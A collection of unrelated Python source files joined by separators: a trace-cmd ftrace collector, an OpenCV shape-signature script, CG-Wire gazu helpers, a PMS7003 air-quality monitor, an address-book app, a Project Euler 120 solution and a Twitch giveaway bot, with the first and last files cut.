'sched_migrate_task',
'sched_process_exec',
'sched_process_fork',
'sched_stat_iowait',
'sched_switch',
'sched_wakeup',
'sched_wakeup_new',
]
TIMEOUT = 180
class FtraceCollector(TraceCollector):
def __init__(self, target,
events=None,
buffer_size=None,
buffer_size_step=1000,
buffer_size_file='/sys/kernel/debug/tracing/buffer_size_kb',
marker_file='/sys/kernel/debug/tracing/trace_marker',
automark=True,
autoreport=True,
autoview=False,
no_install=False,
):
super(FtraceCollector, self).__init__(target)
self.events = events if events is not None else DEFAULT_EVENTS
self.buffer_size = buffer_size
self.buffer_size_step = buffer_size_step
self.buffer_size_file = buffer_size_file
self.marker_file = marker_file
self.automark = automark
self.autoreport = autoreport
self.autoview = autoview
self.target_output_file = os.path.join(self.target.working_directory, OUTPUT_TRACE_FILE)
self.target_binary = None
self.host_binary = None
self.start_time = None
self.stop_time = None
self.event_string = _build_trace_events(self.events)
self._reset_needed = True
self.host_binary = which('trace-cmd')
self.kernelshark = which('kernelshark')
if not self.target.is_rooted:
raise TargetError('trace-cmd instrument cannot be used on an unrooted device.')
if self.autoreport and self.host_binary is None:
raise HostError('trace-cmd binary must be installed on the host if autoreport=True.')
if self.autoview and self.kernelshark is None:
raise HostError('kernelshark binary must be installed on the host if autoview=True.')
if not no_install:
host_file = os.path.join(PACKAGE_BIN_DIRECTORY, self.target.abi, 'trace-cmd')
self.target_binary = self.target.install(host_file)
else:
if not self.target.is_installed('trace-cmd'):
raise TargetError('No trace-cmd found on device and no_install=True is specified.')
self.target_binary = 'trace-cmd'
def reset(self):
if self.buffer_size:
self._set_buffer_size()
self.target.execute('{} reset'.format(self.target_binary), as_root=True, timeout=TIMEOUT)
self._reset_needed = False
def start(self):
self.start_time = time.time()
if self._reset_needed:
self.reset()
if self.automark:
self.mark_start()
self.target.execute('{} start {}'.format(self.target_binary, self.event_string), as_root=True)
def stop(self):
self.stop_time = time.time()
if self.automark:
self.mark_stop()
self.target.execute('{} stop'.format(self.target_binary), timeout=TIMEOUT, as_root=True)
self._reset_needed = True
def get_trace(self, outfile):
if os.path.isdir(outfile):
outfile = os.path.join(outfile, os.path.dirname(self.target_output_file))
self.target.execute('{} extract -o {}'.format(self.target_binary, self.target_output_file),
timeout=TIMEOUT, as_root=True)
# The size of trace.dat will depend on how long trace-cmd was running.
# Therefore timout for the pull command must also be adjusted
# accordingly.
pull_timeout = self.stop_time - self.start_time
self.target.pull(self.target_output_file, outfile, timeout=pull_timeout)
if not os.path.isfile(outfile):
self.logger.warning('Binary trace not pulled from device.')
else:
if self.autoreport:
textfile = os.path.splitext(outfile)[0] + '.txt'
self.report(outfile, textfile)
if self.autoview:
self.view(outfile)
def report(self, binfile, destfile):
# To get the output of trace.dat, trace-cmd must be installed
# This is done host-side because the generated file is very large
try:
command = '{} report {} > {}'.format(self.host_binary, binfile, destfile)
self.logger.debug(command)
process = subprocess.Popen(command, stderr=subprocess.PIPE, shell=True)
_, error = process.communicate()
if process.returncode:
raise TargetError('trace-cmd returned non-zero exit code {}'.format(process.returncode))
if error:
# logged at debug level, as trace-cmd always outputs some
# errors that seem benign.
self.logger.debug(error)
if os.path.isfile(destfile):
self.logger.debug('Verifying traces.')
with open(destfile) as fh:
for line in fh:
if 'EVENTS DROPPED' in line:
self.logger.warning('Dropped events detected.')
break
else:
self.logger.debug('Trace verified.')
else:
self.logger.warning('Could not generate trace.txt.')
except OSError:
raise HostError('Could not find trace-cmd. Please make sure it is installed and is in PATH.')
def view(self, binfile):
check_output('{} {}'.format(self.kernelshark, binfile), shell=True)
def teardown(self):
self.target.remove(self.target.path.join(self.target.working_directory, OUTPUT_TRACE_FILE))
def mark_start(self):
self.target.write_value(self.marker_file, TRACE_MARKER_START, verify=False)
def mark_stop(self):
self.target.write_value(self.marker_file, TRACE_MARKER_STOP, verify=False)
def _set_buffer_size(self):
target_buffer_size = self.buffer_size
attempt_buffer_size = target_buffer_size
buffer_size = 0
floor = 1000 if target_buffer_size > 1000 else target_buffer_size
while attempt_buffer_size >= floor:
self.target.write_value(self.buffer_size_file, attempt_buffer_size, verify=False)
buffer_size = self.target.read_int(self.buffer_size_file)
if buffer_size == attempt_buffer_size:
break
else:
attempt_buffer_size -= self.buffer_size_step
if buffer_size == target_buffer_size:
return
while attempt_buffer_size < target_buffer_size:
attempt_buffer_size += self.buffer_size_step
self.target.write_value(self.buffer_size_file, attempt_buffer_size, verify=False)
buffer_size = self.target.read_int(self.buffer_size_file)
if attempt_buffer_size != buffer_size:
message = 'Failed to set trace buffer size to {}, value set was {}'
self.logger.warning(message.format(target_buffer_size, buffer_size))
break
def _build_trace_events(events):
event_string = ' '.join(['-e {}'.format(e) for e in events])
return event_string
|
<filename>submodules/ImageTools/SignatureInfo.py
import cv2
import numpy as np
import matplotlib.pyplot as plt
def get_contours_binary(img):
imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
print(type(imgray))
ret, thresh = cv2.threshold(imgray, 127, 255, 0)
thresh_white = 255 - thresh
# if your python-cv version is less than 4.0 the cv2.findContours will return 3 variable
_, contours, hierarchy = cv2.findContours(thresh_white, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
return contours
def mark_center(contours, img=None, isShow=False):
for i in contours:
# calculate moments for each contour
M = cv2.moments(i)
if M["m00"] == 0:
M["m00"] = 1
# calculate x,y coordinate of center
cX = int(M["m10"] / M["m00"])
cY = int(M["m01"] / M["m00"])
if isShow is True:
# cv2.drawContours(img, [c], -1, (0, 255, 0), 2)
img_center = cv2.circle(img, (cX, cY), 3, (20, 255, 0), -1)
# cv2.putText(img, "centroid", (cX - 25, cY - 25),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)
cv2.imshow("img_center", img_center)
cv2.waitKey(0)
return (cX, cY)
def get_signature_info(contours, center, isShow=False):
cX, cY = center
contours = np.array(contours)
points = contours[0, :, 0, :]
# print(points)
start_point = 0
for i in range(points.shape[0]):
pX = points[i, 0]
pY = points[i, 1]
if cY == pY:
if cX < pX:
print(pX, pY)
print("start")
start_point = i
break
center_dist_infos = {}
vecter_0 = np.array([points[start_point, 0] - cX, 0])
for i in range(points.shape[0]):
pX = points[i, 0]
pY = points[i, 1]
center_dist = (abs(cX - pX) ** 2 + abs(cY - pY) ** 2) ** (1 / 2)
vecter_a = np.array([points[i, 0] - cX, cY - points[i, 1]])
# theta = np.degrees(np.arccos((vecter_0 - vecter_a) / vecter_0[0] * center_dist)) 錯的???
theta = np.degrees(np.arccos(np.dot(vecter_0, vecter_a) / (vecter_0[0] * center_dist)))
if pY > cY:
theta = 360 - theta
center_dist_infos.update({theta: center_dist})
center_dist_infos_ls = sorted(center_dist_infos.items(), key=lambda x: x[0])
center_dist_infos = {}
for item in center_dist_infos_ls:
center_dist_infos.update({item[0]: item[1]})
if isShow is True:
plt.clf()
plt.xlim([0, 360])
plt.ylim([0, max(center_dist_infos.values()) + 20])
a = list(center_dist_infos.keys())
b = list(center_dist_infos.values())
plt.plot(a, b)
plt.show()
return center_dist_infos
if __name__ == "__main__":
paths = ['images/square.jpg', 'images/pantagon.jpg', 'images/star.bmp']
i = 0
for path in paths:
img = cv2.imread(path)
contours = get_contours_binary(img)
img_contours = cv2.drawContours(img.copy(), contours, -1, (0, 255, 0), 3)
center = mark_center(contours)
img_center = cv2.circle(img_contours, center, 3, (20, 255, 0), -1)
signature_info = get_signature_info(contours, center, isShow=False)
plt.subplot(3, 3, i + 1)
plt.imshow(img, cmap='gray', interpolation='bilinear')
plt.title("oringal {}".format(path[7:-4])), plt.xticks([]), plt.yticks([])
plt.subplot(3, 3, i + 1 + 3)
plt.imshow(img_contours, cmap='gray', interpolation='bilinear')
plt.title("contours {}".format(path[7:-4])), plt.xticks([]), plt.yticks([])
plt.subplot(3, 3, i + 1 + 3 + 3)
plt.title("signature {}".format(path[7:-4])), plt.xticks([]), plt.yticks([])
plt.xlim([0, 360])
y_min = min(signature_info.values())
y_max = max(signature_info.values())
plt.ylim([y_min - 10, y_max + 10])
# plt.pcolor((0, 360, 45), (0, max(signature_info.values()) +
# 20, (max(signature_info.values()) + 20) / 10))
a = list(signature_info.keys())
b = list(signature_info.values())
plt.plot(a, b)
plt.xticks([0, 90, 180, 270, 360], [r'$0$', r'$\pi/2$', r'$\pi$', r'2$\pi/3$', r'2$\pi$'])
plt.yticks([y_min - 10, y_min + (y_max - y_min) / 2, y_max + 10])
i += 1
plt.show()
|
import sys
import logging
import requests.exceptions
import gazu
from Qt import QtCore
log = logging.getLogger(__name__)
def get_cgwire_data(data):
"""Return data from CG-Wire using `type` and `id`.
Args:
data (dict): Dictionary containing "type" and "id" of the query.
Returns:
dict: The result from Gazu.
"""
assert "type" in data
assert "id" in data
fn_name = data["type"].lower()
# Get the module (e.g. gazu.project, gazu.asset, gazu.shot)
module = getattr(gazu, fn_name)
# Request the result by id
fn = getattr(module, "get_{0}".format(fn_name))
return fn(data["id"])
def get_web_url(entity=None):
"""Get the web url for the given entity
Note: This might not work with all entity types!
"""
# todo: continue implementation (only tested with "tasks" for now)
conversion = {
"TaskType": "task-types",
"Project": "productions",
"Person": "people",
"Asset": "assets",
"Shot": "shots",
"Task": "tasks"
}
def _format_url(entity):
"""Format the URL element for an entity"""
entity_type = entity["type"]
return "/{type}/{id}".format(type=conversion[entity_type],
id=entity["id"])
# Get base URL from current host
host_api = gazu.client.get_host()
url = host_api[:-4] # remove '/api'
# When no entity is given just go to the base CG-Wire page.
if entity is None:
return url
# Ensure we get the "full" entity with parent data
entity = get_cgwire_data(entity)
if entity["type"] == "Task":
# /productions/{project-id}/{for_entity}/tasks/{task_id}
# parent: 'assets' or 'shots'
parent = conversion[entity["task_type"]["for_entity"]]
return (
url + _format_url(entity["project"]) +
"/" + parent + _format_url(entity)
)
elif entity["type"] == "Asset" or entity["type"] == "Shot":
# For assets and shots it must be prefixed with project
return url + _format_url(entity["project"]) + _format_url(entity)
return url + _format_url(entity)
def is_valid_api_url(url):
"""Return whether the API url is valid for zou/gazu
This checks the JSON response from the `host/api` url
to see whether it contains the api == Zou value.
Returns:
bool: Whether the url is the /api url for CG-Wire's zou.
"""
# Just use the gazu client's request session
session = gazu.client.requests_session
result = session.get(url)
if result.status_code != 200:
# The status is not as expected from a valid CG-Wire zou
# api url. So we consider this to be an invalid response.
return False
try:
data = result.json()
except ValueError as exc:
# If not JSON data can be decoded we assume it's an invalid
# api url.
return False
if "api" in data and "version" in data and data["api"] == "Zou":
return True
return False
def is_logged_in():
"""Return whether you are currently logged in with Gazu"""
try:
user = gazu.client.get_current_user()
if user:
return True
except (gazu.exception.NotAuthenticatedException,
requests.exceptions.ConnectionError):
# If we are not authenticated assume we are not
# logged in and allow it to pass.
pass
return False
def log_out():
"""Log out from Gazu by clearing its access tokens."""
tokens = {
"access_token": "",
"refresh_token": ""
}
gazu.client.tokens = tokens
class Worker(QtCore.QThread):
"""Perform work in a background thread."""
def __init__(self, function, args=None, kwargs=None, parent=None):
"""Execute *function* in separate thread.
It stores the threaded function call's result in `self.result`.
When an exception occurs the error is stored in `self.error`
Args:
function (function): The function that will be threaded.
args (tuple or list): positional arguments
kwargs (dict): keyword arguments to pass to the function
on execution.
parent (QtCore.QObject): The parent Qt object.
Example usage:
try:
worker = Worker(fn, args=[42])
worker.start()
while worker.isRunning():
app = QtGui.QApplication.instance()
app.processEvents()
if worker.error:
raise worker.error[1], None, worker.error[2]
except Exception as error:
traceback.print_exc()
"""
super(Worker, self).__init__(parent=parent)
self.function = function
self.args = args or []
self.kwargs = kwargs or {}
self.result = None
self.error = None
def run(self):
"""Execute function and store result."""
try:
self.result = self.function(*self.args, **self.kwargs)
except Exception:
self.error = sys.exc_info()
|
#!/usr/bin/env python
import click
from colorama import Fore, Style
import logging
import os
import systemd_watchdog
from typing import Tuple, Optional, List
from influxdb_logger import InfluxdbLogger
from pms7003 import PMS7003, PMSData, SearchResult
def get_aqi(pm25: float) -> str:
"""return the aqi for the pm25 value"""
# https://en.wikipedia.org/wiki/Air_quality_index#Computing_the_AQI
# Table for computing AQI from PM2.5, ug/m3
# c_low, c_high, i_low, i_high
breakpoint_table = [
[ 0, 12.0, 0, 50],
[ 12.1, 35.4, 51, 100],
[ 35.5, 55.4, 101, 150],
[ 55.5, 150.4, 151, 200],
[150.5, 250.4, 201, 300],
[250.5, 350.4, 301, 400],
[350.5, 500.4, 401, 500],
]
category_row = next(x for x in breakpoint_table if pm25 <= x[1])
c_low, c_high, i_low, i_high = category_row
aqi = (i_high - i_low) / (c_high - c_low) * (pm25 - c_low) + i_low
return round(aqi)
def get_aqi_level(aqi: float) -> Tuple[str, str]:
"""get colorized breakpoint for the aqi value"""
if aqi < 50:
return "Good", Fore.GREEN
elif aqi < 100:
return "Moderate", Fore.YELLOW
elif aqi < 150:
return "Unhealthy for Certain Groups", f"{Fore.YELLOW}{Style.BRIGHT}"
elif aqi < 200:
return "Unhealthy", Fore.RED
elif aqi < 300:
return "Very Unhealthy", f"{Fore.RED}{Style.BRIGHT}"
else:
return "Hazardous", Fore.MAGENTA
def print_debug(data: PMSData) -> None:
"""print the entire PMSData structure to the console"""
print(
"============================================================================"
)
print(
"Header : %c %c \t\t | Frame length : %s"
% (data.header_high, data.header_low, data.frame_length)
)
print("PM 1.0 (CF=1) : %s\t | PM 1.0 : %s" % (data.pm1_0_cf1, data.pm1_0_atm))
print("PM 2.5 (CF=1) : %s\t | PM 2.5 : %s" % (data.pm2_5_cf1, data.pm2_5_atm))
print("PM 10.0 (CF=1) : %s\t | PM 10.0 : %s" % (data.pm10_0_cf1, data.pm10_0_atm))
print("0.3um in 0.1L of air : %s" % (data.count_0_3))
print("0.5um in 0.1L of air : %s" % (data.count_0_5))
print("1.0um in 0.1L of air : %s" % (data.count_1_0))
print("2.5um in 0.1L of air : %s" % (data.count_2_5))
print("5.0um in 0.1L of air : %s" % (data.count_5_0))
print("10.0um in 0.1L of air : %s" % (data.count_10_0))
print("Reserved F : %s" % data.reserved)
print("CHKSUM : %s" % data.checksum)
print(
"============================================================================"
)
def print_pm(data: PMSData) -> None:
"""print PM values to the console"""
aqi = get_aqi(data.pm2_5_atm)
level, style = get_aqi_level(aqi)
result = {
"PM 1.0": data.pm1_0_atm,
"PM 2.5": f"{style}{data.pm2_5_atm}{Style.RESET_ALL}",
"PM 10": data.pm10_0_atm,
"AQI": f"{style}{aqi} ({level}){Style.RESET_ALL}",
}
pairs = [f"{k}: {v}" for k, v in result.items()]
click.echo(" ".join(pairs))
def configure_logging(debug: bool) -> None:
"""sets up logging to stdout"""
root = logging.getLogger("mini-aqm")
root.addHandler(logging.StreamHandler())
root.setLevel(logging.DEBUG if debug else logging.ERROR)
root.debug("configured debug logging")
@click.command()
@click.option(
"--port",
default=None,
help="Location of PMS7003 TTY device",
show_default="scans possible ports for devices",
)
@click.option(
"--debug/--no-debug",
default=False,
help="Print debug data from the device",
show_default=True,
)
@click.option(
"--log-only/--no-log-only",
default=False,
help="Only log to the influxdb log file; nothing on stdout",
)
@click.option(
"--log-path",
default="measurements.log",
help="Location where logs are written",
show_default=True,
)
def main(port: Optional[str], debug: bool, log_only: bool, log_path: str) -> None:
configure_logging(debug)
log = logging.getLogger("mini-aqm.main")
log.debug("looking for possible PMS7003 devices...")
possible: List[SearchResult] = PMS7003.find_devices(only=port)
if not any(possible):
click.echo(
f"{Fore.RED}"
f"no serial devices found. is your device plugged in? did you install drivers?"
f"{Style.RESET_ALL}",
err=True,
)
return
for p in possible:
if p.dev is None:
click.echo(
f"{Fore.YELLOW}"
f"error on {p.desc} {p.port}: {p.error}"
f"{Style.RESET_ALL}",
err=True,
)
devs = [p.dev for p in possible if p.dev]
if not any(devs):
click.echo(
f"{Fore.RED}"
f"no PMS7003 devices found; resolve any errors printed above and try again"
f"{Style.RESET_ALL}",
err=True,
)
return
logger = InfluxdbLogger(log_path)
click.echo(
f"{Fore.BLUE}"
f"writing influxdb measurement {logger.MEASUREMENT} to {logger.path}"
f"{Style.RESET_ALL}"
)
for dev in devs:
click.echo(
f"{Fore.GREEN}beginning to read data from {dev.id}...{Style.RESET_ALL}"
)
# systemd watchdog, in case this is running as a systemd service
wd = systemd_watchdog.watchdog()
wd.ready()
while True:
wd.ping()
for dev in devs:
data = dev.read()
if debug:
print_debug(data)
else:
logger.emit(
fields={
k: v for k, v in data._asdict().items() if k.startswith("pm")
},
tags={"type": "PMS7003", "id": dev.id},
)
if not log_only:
print_pm(data)
if __name__ == "__main__":
main()
|
<reponame>haigdouzdjian/BeetBook
from entry import Entry
from addressBook import AddressBook
from utils import *
class App:
def __init__(self):
self.open_address_books = {}
self.address_book_count = 0
self.default_fields = []
self.filename = ''
def check_address_book_id(self,book_id):
if book_id in self.open_address_books.keys():
return True
else:
return False
def check_entry_id(self, book_id, entry_id):
return self.open_address_books.get(book_id).get('object').check_entry_id(entry_id)
def get_default_fields(self):
entry = Entry()
entry = entry.get_values()
temp = []
for key in entry:
temp.append(key)
return temp
#creates a new blank addressbook
#returns that address book's ID
def create_address_book(self, address_book_name):
#create addressbook and get hash
new_ad = AddressBook(address_book_name)
original_hash = hash(new_ad)
#create a temporary dictionary and add values {hash, AddressBook}
temp_dict = {}
temp_dict['initialHash'] = original_hash
temp_dict['object'] = new_ad
# add temp_dict to list of open addressbooks and increment book_count
self.open_address_books[self.address_book_count] = temp_dict
temp_dict['object'].set_meta('address_book_id', self.address_book_count)
self.address_book_count += 1
log(self.open_address_books)
#return id of new_ad
return self.address_book_count - 1
#opens an addressbook from an existing
def open_address_book(self, filename = ''):
#create addressbook, import from json
new_ad = AddressBook()
valid = new_ad.import_json(filename, self.address_book_count)
#check to see if import was sucessful
if valid:
original_hash = hash(new_ad)
#create a temporary dictionary and add values {hash, AddressBook}
temp_dict = {}
temp_dict['initialHash'] = original_hash
temp_dict['object'] = new_ad
new_ad.set_meta('address_book_id', self.address_book_count)
# add temp_dict to list of open addressbooks and increment book_count
self.open_address_books[self.address_book_count] = temp_dict
new_ad.set_meta('address_book_id', self.address_book_count)
self.address_book_count += 1
#return id of new_ad
return self.address_book_count - 1
else:
return -1
def close_address_book(self, address_book_id = -1, force = False):
if self.check_address_book_id(address_book_id) == False:
#addressBook already closed
return True
if force == False:
initial_hash = self.open_address_books.get(address_book_id).get('initialHash')
new_hash = hash(self.open_address_books.get(address_book_id).get('object'))
if initial_hash != new_hash:
return False
else:
del self.open_address_books[address_book_id]
else:
del self.open_address_books[address_book_id]
def save_address_book(self, address_book_id = -1, filename = ''):
if filename != '':
self.open_address_books.get(address_book_id).get('object').set_file_name(filename)
elif self.open_address_books.get(address_book_id).get('object').get_file_name() == '':
return 1
if self.open_address_books.get(address_book_id).get('object').save():
self.open_address_books.get(address_book_id)['initialHash'] = hash(self.open_address_books.get(address_book_id).get('object'))
return 0
else:
return 2
def create_entry(self, address_book_id = -1, entry_data = None):
if self.check_address_book_id(address_book_id) and entry_data != None:
new_entry = Entry(entry_data)
new_entry.set_value('address_book_id',address_book_id)
result = self.open_address_books.get(address_book_id).get('object').add_entry(new_entry)
return result
else:
return False
def delete_entry(self, address_book_id = -1, entry_id = -1):
if self.check_address_book_id(address_book_id):
result = self.open_address_books.get(address_book_id).get('object').delete_entry(entry_id)
return result
else:
return False
def update_entry(self, entry_data = {}):
address_book_id = entry_data.get('address_book_id')
if len(entry_data) > 0:
return self.open_address_books.get(address_book_id).get('object').update_entry(entry_data)
else:
return False
def get_address_book(self, address_book_id = -1):
if self.check_address_book_id(address_book_id):
return str(self.open_address_books.get(address_book_id).get('object'))
else:
return False
def import_tsv(self, address_book_id = -1, filename = ''):
if '.tsv' in filename and self.check_address_book_id(address_book_id):
result = self.open_address_books.get(address_book_id).get('object').import_tsv(filename,address_book_id)
return result
else:
return -1
def export_tsv(self, address_book_id = -1, filename = '', entry_ids = []):
if '.tsv' in filename and self.check_address_book_id(address_book_id):
result = self.open_address_books.get(address_book_id).get('object').export_tsv(filename,entry_ids)
return result
else:
return -1
def sort_address_book(self, address_book_id = -1, key = 'last_name', orderBy = 'asc'):
result = self.open_address_books.get(address_book_id).get('object').sort(key,orderBy)
return result
def update_book_name(self,address_book_id = -1, new_book_name = ''):
if address_book_id == -1 or new_book_name == '':
return False
else:
return self.open_address_books.get(address_book_id).get('object').set_meta('name',new_book_name)
def get_open_address_books(self):
return self.open_address_books
|
# Question: https://projecteuler.net/problem=120
# The coefficients of a^(odd) cancel out, so there might be a pattern ...
# n | X_n = (a-1)^n + (a+1)^n | mod a^2
#-----|----------------------------|--------
# 1 | 2a | 2a
# 2 | 2a^2 + 2 | 2
# 3 | 2a^3 + 6a | 6a
# 4 | 2a^4 + 6a^2 + 2 | 2
# 5 | 2a^5 + 20a^3 + 10a | 10a
# 6 | 2a^6 + 30a^4 + 30a^2 + 2 | 2
# 7 | 2a^7 + 42a^5 + 70a^3 + 14a | 14a
# So, if n is even, X^n = 2 (mod a^2)
# if n is odd, X^n = 2na (mod a^2)
# For a given 'a', what is the maximum x such that 2na = x (mod a^2) where n is an abitrary positive integer?
# We know that 2na is even, so if a if odd, the highest possible value of x is a^2 - 1
# if a is even, the highest possible value of x is a^2 - 2
# If a is even, then there exists k such that a = 2k. pick n = k, we have 2na = 2ka = a^2 = 0 (mod a^2)
# n = k - 1, we have 2na = a^2 - 2a (mod a^2)
# n = k - 2, we have 2na = a^2 - 4a (mod a^2)
# ...
# n = k - k, we have 2na = a^2 - 2ka = a^2 - a^2 = 0 (mod a^2)
# so the modulo group is {0, a^2 - 2ka}
# If a is odd, then there exists k such that a = 2k + 1. Pick n = 2k+1, then 2na = 2(2k+1)a = 2a^2 = 0 (mod a^2)
# ...
# n = k+2, then 2na = 2(k+2)a = (2k+1)a + 3a = a^2 + 3a = 3a = a^2 - a^2 + 3a = a^2 - (2k-2)a (mod a^2)
# n = k+1, then 2na = 2(k+1)a = (2k+1)a + a = a^2 + a = a = a^2 - (2k)a (mod a^2)
# start here -> n = k, then 2na = 2ka = (2k+1)a - a = a^2 - a (mod a^2)
# n = k-1, then 2na = 2(k-1)a = (2k+1)a - 3a = a^2 - 3a (mod a^2)
# n = k-2, then 2na = 2(k-2)a = (2k+1)a - 5a = a^2 - 5a (mod a^2)
# ...
# n = k-k, then 2na = 0 (mod a^2)
# so the modulo group is {0, a^2 - ka}
# So, if 'a' is odd, r_max = max(2, a^2 - a). Since a >= 3, r_max = a^2 - a
# if 'a' is even, r_max = max(2, a^2 - 2a). Since a >= 3, r_max = a^2 - 2a
# So, sum_{3,n}(r_max) = [sum_{1,n}(a^2-a)] - [sum_{3<=a<=n, 'a' even} (a)] - {a=1}(a^2-a) - {a=2}(a^2-a)
# = [sum_{1,n}(a^2-a)] - (2*[sum_{1<=i<=floor(n/2)} (i)] - 2) - {a=1}(a^2-a) - {a=2}(a^2-a)
# = 1/6 * n * (n+1) * (2n+1) - 1/2 * n * (n+1) - (2*n/2*(n/2+1) - 2) - 0 - 2
# = 1/3 * (n-1) * n * (n+1) - 1/4*n*(n+2)
N = 1000
result = (N-1)*N*(N+1) // 3 - N * (N+2)//4
print(result)
|
import os
import csv
import random
import configparser
import logging
import sys
import asyncio
from typing import Set, Any
from twitchio.ext import commands
logger = logging.getLogger('bot')
class IgnoreList:
_users: Set[str]
_filename: str
def __init__(self, filename: str = None):
self._filename = filename or 'ignorelist.txt'
self._users = set()
def load(self):
logger.info('Loading ignorelist...')
if not os.path.isfile(self._filename):
logger.info('Ignorelist not found')
logger.info('Create empty ignorelist...')
with open(self._filename, 'a') as _file:
pass
try:
with open(self._filename, 'r') as _file:
rows = csv.reader(_file, delimiter=' ', quotechar='"')
for user, *_ in rows:
if user:
self._users.add(user.lower())
except Exception as e:
print('Fail to load "{self.filename}":', e)
logger.info(f'{len(self._users)} users ignored')
logger.debug(f'Ignored users: {self._users}')
def __contains__(self, user: str):
return user in self._users
class Scoreboard:
_filename: str
def __init__(self, filename=None):
self._filename = filename or 'scoreboard.txt'
self._scoreboard = {}
def load(self):
logger.info('Loading scoreboard...')
if not os.path.isfile(self._filename):
return
scoreboard = {}
try:
with open(self._filename, 'r') as _file:
rows = csv.reader(_file, delimiter=' ', quotechar='"')
for row in rows:
name, score, *_ = row
if name and score is not None:
scoreboard[name.lower()] = int(score)
self._scoreboard = scoreboard
except Exception as e:
logger.warning(f'Fail to load "{self._filename}":', e)
for name, score in scoreboard.items():
logger.debug(f'Scoreboard: {name} {score}')
def save(self):
logger.info(f'Saving scoreboard to "{self._filename}"')
with open(self._filename, 'w', newline='') as _file:
_writer = csv.writer(_file, delimiter=' ', quotechar='"', quoting=csv.QUOTE_MINIMAL)
_writer.writerows(sorted(self._scoreboard.items(), key=lambda x: (-x[1], x[0])))
def get(self, user: str) -> int:
return self._scoreboard.get(user, 0)
def reset(self, user: str) -> None:
self._scoreboard[user] = 0
def bump(self, user: str, points: int) -> None:
logger.debug(f'Bumping score for user {user} with ')
if user in self._scoreboard:
self._scoreboard[user] += points
else:
self._scoreboard[user] = points
class Giveaway:
scoreboard: Scoreboard
ignorelist: IgnoreList
opened: bool
participants: Set[str]
sub_luck: int
def __init__(self, sub_luck: int):
self.scoreboard = Scoreboard()
self.ignorelist = IgnoreList()
self.ignorelist.load()
self.opened = False
self.sub_luck = sub_luck
self.participants = set()
self._lock = asyncio.Lock()
def open(self):
if not self.opened:
self.scoreboard.load()
self.opened = True
self.participants = set()
logger.info('Giveaway is opened')
def reopen(self):
if not self.opened:
self.opened = True
logger.info('Giveaway is re-opened')
def close(self):
if self.opened:
self.scoreboard.save()
self.opened = False
logger.info('Giveaway is closed')
logger.debug(f'Participants: {self.participants}')
def winner(self):
if self.opened:
logger.warning("Can't pick a winner: Close giveaway to pick a winner")
return
if not self.participants:
logger.warning("Can't pick a winner: No participants")
return
participants = list(self.participants)
weights = [self.scoreboard.get(name) for name in participants]
winner_name, *_ = random.choices(participants, weights)
self.scoreboard.reset(winner_name)
self.participants.discard(winner_name)
self.scoreboard.save()
return winner_name
def add(self, name: str, is_subscriber: bool = False) -> None:
logger.debug(f'Try to add participant {name}')
if not self.opened:
return
if name in self.participants:
return
if name in self.ignorelist:
logger.debug(f'User {name} in ignorelist')
return
self.participants.add(name)
if is_subscriber:
self.scoreboard.bump(name, self.sub_luck)
else:
self.scoreboard.bump(name, 1)
class Bot(commands.Bot):
SUB_LUCK: int
ADMIN: str
BOT_PREFIX: str
CHANNEL: str
BOT_NICK: str
TMI_TOKEN: str
def __init__(self):
config = configparser.ConfigParser()
config.read('settings.ini')
self.TMI_TOKEN = config['bot']['TMI_TOKEN']
self.BOT_NICK = config['bot']['BOT_NICK']
self.CHANNEL = config['bot']['CHANNEL']
self.BOT_PREFIX = config['bot'].get('BOT_PREFIX', '!')
self.ADMIN = config['bot']['ADMIN']
self.SUB_LUCK = config['bot'].getint('SUB_LUCK', fallback=1)
self.giveaway = None
self.blacklist = None
self._lock = asyncio.Lock()
super().__init__(
irc_token=self.TMI_TOKEN,
nick=self.BOT_NICK,
prefix=self.BOT_PREFIX,
initial_channels=[self.CHANNEL],
)
async def event_pubsub(self, data):
pass
def is_admin(self, user):
return user.name.lower() == self.ADMIN.lower()
async def event_ready(self):
self.giveaway = Giveaway(self.SUB_LUCK)
logger.info(f'Bot {self.nick} ready')
async def event_message(self, message):
await self.handle_commands(message)
@commands.command(name='open', aliases=['o'])
async def open_command(self, ctx):
if self.is_admin(ctx.author):
async with self._lock:
logger.info('!open')
if not self.giveaway.opened:
self.giveaway.open()
await ctx.send_me(f'== Giveaway is opened == Type !giveaway to participate')
@commands.command(name='reopen', aliases=['reo'])
async def reopen_command(self, ctx):
if self.is_admin(ctx.author):
async with self._lock:
logger.info('!reopen')
if not self.giveaway.opened:
self.giveaway.reopen()
await ctx.send_me(f'== Giveaway is RE-opened == Harry up! Type !giveaway to participate')
@commands.command(name='close', aliases=['c'])
async def close_command(self, ctx):
if self.is_admin(ctx.author):
async with self._lock:
logger.info('!close')
if self.giveaway.opened:
self.giveaway.close()
await ctx.send_me(f'== Giveaway is closed == Pick the winner')
@commands.command(name='winner', aliases=['w'])
async def winner_command(self, ctx):
if self.is_admin(ctx.author):
async with self._lock:
logger.info('!winner')
winner = self.giveaway.winner()
if winner is not None:
await ctx.send_me(f'== The winner is @{winner} ==')
else:
await ctx.send_me(f'== No participants ==')
@commands.command(name='giveaway', aliases=['ga'])
async def giveaway_command(self, ctx):
self.giveaway.add(ctx.author.name.lower(), ctx.author.is_subscriber)
@commands.command(name='scoreboard', aliases=['sb'])
async def scoreboard_command(self, ctx):
if self.is_admin(ctx.author):
async with self._lock:
logger.info('!scoreboard')
for name in self.giveaway.participants:
logger.info(f'Scoreboard: {name} {self.giveaway.scoreboard.get(name)}')
@commands.command(name='ignorelist')
async def ignorelist_command(self, ctx):
if self.is_admin(ctx.author):
async with self._lock:
logger.info('!ignorelist')
for name in self.giveaway.ignorelist._users:
logger.info(f'Ignorelist: {name}')
@commands.command(name='me')
async def me_command(self, ctx):
if ctx.author.is_subscriber:
await ctx.send_me(f'==> {ctx.author.name} is sub SeemsGood')
else:
await ctx.send_me(f'==> {ctx.author.name} is not sub Kappa')
async def event_command_error(self, ctx, error):
logger.error(f'Error: {error}', exc_info=True)
if __name__ == "__main__":
file_handler = logging.FileHandler('bot.log')
file_handler.setLevel(logging.DEBUG)
stream_handler = logging.StreamHandler(sys.stdout)
stream_handler.setLevel(logging.INFO)
logging.basicConfig(
format='%(asctime)s [%(levelname)s] [%(name)s] %(message)s',
level=logging.DEBUG,
handlers=[file_handler, stream_handler],
)
bot = Bot()
bot.run()
|
# Library for JSTest manifests.
#
# This includes classes for representing and parsing JS manifests.
import os, re, sys
from subprocess import *
from tests import TestCase
def split_path_into_dirs(path):
dirs = [path]
